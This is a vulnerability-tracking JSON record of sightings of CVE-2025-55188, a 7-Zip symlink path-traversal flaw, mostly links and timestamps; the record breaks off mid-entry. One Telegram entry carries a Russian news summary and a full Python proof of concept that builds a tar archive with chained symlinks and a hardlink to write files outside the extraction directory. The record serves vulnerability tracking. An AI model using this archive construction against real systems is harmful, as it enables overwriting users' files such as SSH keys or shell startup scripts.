{"vulnerability": "CVE-2025-55188", "sightings": [{"uuid": "1b2c3a23-ad5f-4f99-8649-3fecac9712bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3lvyu5qxsfr23", "content": "", "creation_timestamp": "2025-08-09T22:51:21.385654Z"}, {"uuid": "d0483276-4bc6-47b2-87bc-76ed5a927fc7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/82", "content": "", "creation_timestamp": "2025-08-09T20:16:03.000000Z"}, {"uuid": "8af666c6-25fa-4fc9-8aad-4b4f9f4b5f5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3lvzddadt2a2g", "content": "", "creation_timestamp": "2025-08-10T03:22:51.407990Z"}, {"uuid": "7d3026fe-29b8-48a2-89cc-4a1d2a06b083", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/83", "content": "", "creation_timestamp": "2025-08-10T01:14:58.000000Z"}, {"uuid": "7c85db9f-ca15-42b8-b6a1-1d6a70d76175", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3m3dyyyplgg2r", "content": "", "creation_timestamp": "2025-10-17T00:23:25.560198Z"}, {"uuid": "3104fd6e-6cba-4f0a-82f0-4cc3a66484b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lvwgzkd4xl2d", "content": "", "creation_timestamp": "2025-08-08T23:51:01.956113Z"}, {"uuid": "34791153-9899-4add-860a-0664474faf78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3lw4y2o44eq23", "content": "", "creation_timestamp": "2025-08-11T14:11:51.419355Z"}, {"uuid": "70d1f639-8123-46df-bef0-47b7170b1dca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3lw4ydoxiim2u", "content": "", "creation_timestamp": "2025-08-11T14:16:54.306918Z"}, {"uuid": "b473129c-a79c-4be5-870b-325fcbdd7e79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3lw4ymoxrbp2g", "content": "", "creation_timestamp": "2025-08-11T14:21:56.262294Z"}, {"uuid": "5382c2d0-fc54-4fcc-90b5-d70e24551626", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3lw4yvoopu32v", "content": "", "creation_timestamp": "2025-08-11T14:26:57.971305Z"}, {"uuid": "c45ef958-97f4-4d1f-9359-e6c3d2fde89e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-01409d10-3acc0b24715f1f7a", "content": "", "creation_timestamp": "2025-08-11T15:24:01.510762Z"}, {"uuid": "eed22305-2f0b-4bf8-a1f7-eeda44bb5f0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://bsky.app/profile/thedailytechfeed.com/post/3lw57fp4res2t", "content": "", "creation_timestamp": "2025-08-11T16:23:21.955942Z"}, {"uuid": "bd9914c1-a819-4197-b8b1-6502c3f53f6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/91", "content": "", "creation_timestamp": "2025-08-11T11:57:04.000000Z"}, {"uuid": "29825f0a-8da0-4de0-bad3-a67b49557a18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/90", "content": "", "creation_timestamp": "2025-08-11T11:43:24.000000Z"}, {"uuid": "eb26c148-3e91-4e0e-9955-fdfc128dd40e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/89", "content": "", "creation_timestamp": "2025-08-11T11:35:44.000000Z"}, {"uuid": "c2828e25-9f62-4706-9072-217b81170f9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/88", "content": "", "creation_timestamp": "2025-08-11T11:33:18.000000Z"}, {"uuid": "983b58b4-0bf4-4c03-8c47-5441cb06c450", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3lw6as72ooc2i", "content": "", "creation_timestamp": "2025-08-12T02:20:51.203431Z"}, {"uuid": "0ea15efc-f302-4ad3-8312-813a75cf79f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3lwbmh3g2h42u", "content": "", "creation_timestamp": "2025-08-13T10:27:21.916281Z"}, {"uuid": "025c021d-93b1-4149-bdbd-5f6934e4a3e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3lw2glbpikn2b", "content": "", "creation_timestamp": "2025-08-10T13:53:42.025414Z"}, {"uuid": "5c51a795-9048-40e5-8752-48dfe61327ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://social.circl.lu/users/circl/statuses/115005030949053530", "content": "", "creation_timestamp": "2025-08-10T14:51:48.888350Z"}, {"uuid": "eeed9a50-4436-4cb0-bd5a-e48b14718a8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/84", "content": "", "creation_timestamp": "2025-08-10T11:18:48.000000Z"}, {"uuid": "6ba28f6e-c207-439b-b469-a6f619c82913", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3lw3iowb7kc2u", "content": "", "creation_timestamp": "2025-08-11T00:04:11.546622Z"}, {"uuid": "3e623684-1467-41d4-9583-17d440c02fef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/87", "content": "", "creation_timestamp": "2025-08-10T21:42:13.000000Z"}, {"uuid": "8359efde-6710-49c1-9b5d-c1c57cb3f37c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://bsky.app/profile/buherator.bsky.social/post/3lw3yq446qo27", "content": "", "creation_timestamp": "2025-08-11T04:51:11.622492Z"}, {"uuid": "3eabb6f8-da2f-4e1b-8a78-f59f9ce7dd70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://bsky.app/profile/hackmanac.com/post/3lw4cgofnj22k", "content": "", "creation_timestamp": "2025-08-11T07:44:52.755836Z"}, {"uuid": "0d6f5344-c298-4ea8-b7c4-630bbbc5bf39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/94", "content": "", "creation_timestamp": "2025-08-13T08:02:21.000000Z"}, {"uuid": "9dbac8e6-3663-4958-81ab-cad724571c47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://bsky.app/profile/fr-france.bsky.social/post/3lwcp5qyvw227", "content": "", "creation_timestamp": "2025-08-13T20:48:30.662533Z"}, {"uuid": "2473f449-dcf9-45e3-a1fb-3854597abf04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lwcpwzis2y2f", "content": "", "creation_timestamp": "2025-08-13T21:02:41.869089Z"}, {"uuid": "7cc76766-6a22-4f68-a2b1-67dc6ddb2611", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://bsky.app/profile/ytroncal.bsky.social/post/3lwcunt6ccc2v", "content": "", "creation_timestamp": "2025-08-13T22:27:01.716784Z"}, {"uuid": "e9226008-2087-4179-8cf0-03ad615380d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://bsky.app/profile/bluesky.awakari.com/post/3lwcurrhllk24", "content": "", "creation_timestamp": "2025-08-13T22:29:10.250261Z"}, {"uuid": "3b9209bb-0f94-4142-8e66-b757869b3303", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3lwcurst44el2", "content": "", "creation_timestamp": "2025-08-13T22:30:06.809944Z"}, {"uuid": "16c6571a-6484-4c98-ab8c-4794687baec3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q4/55", "content": "", "creation_timestamp": "2025-10-16T21:03:20.000000Z"}, {"uuid": "93be6dff-a8f0-4843-949d-a643e11e2d1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3m2zvd6dhke23", "content": "", "creation_timestamp": "2025-10-12T23:50:54.789800Z"}, {"uuid": "86daab09-da55-46d6-99d5-b7185914c111", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q4/25", "content": "", "creation_timestamp": "2025-10-12T21:29:45.000000Z"}, {"uuid": "2d0ed3a2-ca36-46e2-89e1-83569e2375f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "published-proof-of-concept", "source": "Telegram/qP4ATtXqVjZ2NQNBpFxFUpCqNtRkP8nG37QRNXEozXO3oQg", "content": "", "creation_timestamp": "2025-08-13T11:00:09.000000Z"}, {"uuid": "49ad0966-c503-4f29-b07e-a73c5b6b8e95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "published-proof-of-concept", "source": "https://t.me/tech_b0lt_Genona/5576", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 tar-fs \u0438 7-Zip, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0435 \u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0444\u0430\u0439\u043b\u044b \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u044b \u0431\u0430\u0437\u043e\u0432\u043e\u0433\u043e \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0430\nhttps://www.opennet.ru/opennews/art.shtml?num=63740\n\n\u0412 NPM-\u043f\u0430\u043a\u0435\u0442\u0435 tar-fs \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c (CVE-2025-48387), \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043f\u0440\u0438 \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u043a\u0435 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u043d\u043e\u0433\u043e tar-\u0430\u0440\u0445\u0438\u0432\u0430 \u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0444\u0430\u0439\u043b\u044b \u0432 \u043b\u044e\u0431\u044b\u0435 \u0447\u0430\u0441\u0442\u0438 \u0424\u0421, \u043d\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u043d\u044b\u0435 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u043e\u043c, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u043a\u0430 (\u043d\u0430\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u0440\u0430\u0432\u0430 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0442\u0435\u043a\u0443\u0449\u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f). \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0434\u043b\u044f \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u0438 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0445 \u0444\u0430\u0439\u043b\u043e\u0432, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0434\u043b\u044f \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0441\u0432\u043e\u0435\u0433\u043e \u043a\u043e\u0434\u0430 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u043f\u0435\u0440\u0435\u043f\u0438\u0441\u0430\u043d\u044b \u0444\u0430\u0439\u043b\u044b \".ssh/id_rsa\" \u0438\u043b\u0438 \".bashrc\" \u0432 \u0434\u043e\u043c\u0430\u0448\u043d\u0435\u043c \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0435 \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 c \u0443\u0447\u0451\u0442\u043e\u043c \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u043f\u0430\u043a\u0435\u0442 tar-fs \u0438\u043c\u0435\u0435\u0442 23 \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u0430 \u0437\u0430\u0433\u0440\u0443\u0437\u043e\u043a \u0432 \u043d\u0435\u0434\u0435\u043b\u044e \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u044c \u0432 1155 \u043f\u0440\u043e\u0435\u043a\u0442\u0430\u0445. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0432 \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u0445 3.0.9, 2.1.3 \u0438 1.16.5, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0431\u044b\u043b\u0438 \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u0432 \u043c\u0430\u0435, \u043d\u043e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0430 \u043b\u0438\u0448\u044c \u0441\u043f\u0443\u0441\u0442\u044f \u043f\u043e\u0447\u0442\u0438 3 \u043c\u0435\u0441\u044f\u0446\u0430.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432\u044b\u0437\u0432\u0430\u043d\u0430 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u044b\u043c\u0438 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430\u043c\u0438 \u0438\u043c\u0435\u044e\u0449\u0438\u0445\u0441\u044f \u0432 \u0430\u0440\u0445\u0438\u0432\u0435 \u0441\u0438\u043c\u0432\u043e\u043b\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0438 \u0436\u0451\u0441\u0442\u043a\u0438\u0445 \u0441\u0441\u044b\u043b\u043e\u043a \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u0438\u0445 \u0432\u044b\u0445\u043e\u0434\u0430 \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u044b \u0446\u0435\u043b\u0435\u0432\u043e\u0433\u043e \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0430 \u0434\u043b\u044f \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u043a\u0438. \u0414\u043b\u044f \u043e\u0431\u0445\u043e\u0434\u0430 \u043f\u0440\u043e\u0432\u0435\u0440\u043e\u043a \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442\u0441\u044f \u0434\u0432\u0435 \u0441\u0438\u043c\u0432\u043e\u043b\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0441\u0441\u044b\u043b\u043a\u0438: \u043f\u0435\u0440\u0432\u0430\u044f \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043d\u0430 \u043a\u043e\u0440\u043d\u0435\u0432\u043e\u0439 \u043a\u0430\u0442\u0430\u043b\u043e\u0433 \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u043a\u0438 \u0430\u0440\u0445\u0438\u0432\u0430 (\".\"), \u0430 \u0432\u0442\u043e\u0440\u0430\u044f \u0441\u043e\u0437\u0434\u0430\u0451\u0442\u0441\u044f \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u0435\u0440\u0432\u043e\u0439 \u0441\u0438\u043c\u0432\u043e\u043b\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0441\u0441\u044b\u043b\u043a\u0438 \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0432 \u0438\u043c\u0435\u043d\u0438 \u0441\u0438\u043c\u0432\u043e\u043b\u044b \"../\" \u0434\u043b\u044f \u0432\u044b\u0445\u043e\u0434\u0430 \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u044b \u0431\u0430\u0437\u043e\u0432\u043e\u0433\u043e \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0430. \u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043f\u0435\u0440\u0432\u0430\u044f \u0441\u0441\u044b\u043b\u043a\u0430 \"noop/noop/noop\" \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043d\u0430 \".\", \u0430 \u0432\u0442\u043e\u0440\u0430\u044f \"noop/noop/noop/../../../\" \u0440\u0430\u0441\u043a\u0440\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a \"./../../../\". \u0414\u043b\u044f \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u0438 \u0444\u0430\u0439\u043b\u043e\u0432 \u0432 \u0430\u0440\u0445\u0438\u0432\u0435 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0441\u043e\u0437\u0434\u0430\u043d\u0430 \u0436\u0451\u0441\u0442\u043a\u0430\u044f \u0441\u0441\u044b\u043b\u043a\u0430, \u0441\u0441\u044b\u043b\u0430\u044e\u0449\u0430\u044f\u0441\u044f \u043d\u0430 \u0432\u043d\u0435\u0448\u043d\u0438\u0439 \u0444\u0430\u0439\u043b \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0432\u0442\u043e\u0440\u043e\u0439 \u0441\u0438\u043c\u0432\u043e\u043b\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0441\u0441\u044b\u043b\u043a\u0438.\n\n\u041f\u043e\u0445\u043e\u0436\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c (CVE-2025-55188) \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u0432 \u0430\u0440\u0445\u0438\u0432\u0430\u0442\u043e\u0440\u0435 7-Zip. \u0414\u043b\u044f \u0437\u0430\u043f\u0438\u0441\u0438 \u0444\u0430\u0439\u043b\u043e\u0432 \u0432\u043d\u0435 \u0431\u0430\u0437\u043e\u0432\u043e\u0433\u043e \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0430 \u0432 7-Zip \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0441\u0438\u043c\u0432\u043e\u043b\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0441\u0441\u044b\u043b\u043a\u0438, \u0438\u043c\u0435\u044e\u0449\u0438\u0435 \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c \"../\" \u0432 \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u043c \u043f\u0443\u0442\u0438. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u043f\u0440\u0438 \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u043a\u0435 \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 7-Zip \u043b\u044e\u0431\u044b\u0445 \u0430\u0440\u0445\u0438\u0432\u043e\u0432, \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u044e\u0449\u0438\u0445 \u0441\u0438\u043c\u0432\u043e\u043b\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0441\u0441\u044b\u043b\u043a\u0438, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, zip, tar, 7z \u0438 rar\n\nPoC\n\nimport tarfile\nimport io\nwith tarfile.open(\"poc.tar\", mode=\"x\") as tar:\n    root = tarfile.TarInfo(\"root\")\n    root.linkname = (\"noop/\" * 15) + (\"../\" * 15)\n    root.type = tarfile.SYMTYPE\n    tar.addfile(root)\n    noop = tarfile.TarInfo(\"noop\")\n    noop.linkname = \".\"\n    noop.type = tarfile.SYMTYPE\n    tar.addfile(noop)\n    hard = tarfile.TarInfo(\"hardflag\")\n    hard.linkname = \"root/home/username/flag/flag\"\n    hard.type = tarfile.LNKTYPE\n    tar.addfile(hard)\n    content = b\"overwrite\\n\"\n    overwrite = tarfile.TarInfo(\"hardflag\")\n    overwrite.size = len(content)\n    overwrite.type = tarfile.REGTYPE\n    tar.addfile(overwrite, fileobj=io.BytesIO(content))\n    content = b\"new!\\n\"\n    newfile = tarfile.TarInfo(\"root/home/username/flag/newfile\")\n    newfile.size = len(content)\n    newfile.type = tarfile.REGTYPE\n    tar.addfile(newfile, fileobj=io.BytesIO(content))", "creation_timestamp": "2025-08-18T17:45:41.000000Z"}, {"uuid": "9ac87809-3fd8-4fc6-b602-bb4720cfb33f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "published-proof-of-concept", "source": "Telegram/hqLfmby8TLMp5eakm1BakY4wq231HE5KiBWhfBWemNzNQxM", "content": "", "creation_timestamp": "2025-08-11T15:00:06.000000Z"}, {"uuid": "3f52a7ca-66f3-4180-a037-2f92255c9121", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/59212", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aProof-of-concept of CVE-2025-55188: 7-Zip arbitrary file write\nURL\uff1ahttps://github.com/lunbun/CVE-2025-55188\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-11-11T06:25:47.000000Z"}, {"uuid": "2a945754-ebe8-4d3e-9414-fe85d357ceb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/52971", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1a\u26a0\ufe0f Demonstrate CVE-2025-55188 with this proof-of-concept exploit for 7-Zip, revealing vulnerabilities in file extraction handling and potential impacts.\nURL\uff1ahttps://github.com/Sh3ruman/CVE-2025-55188-7z-exploit\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": 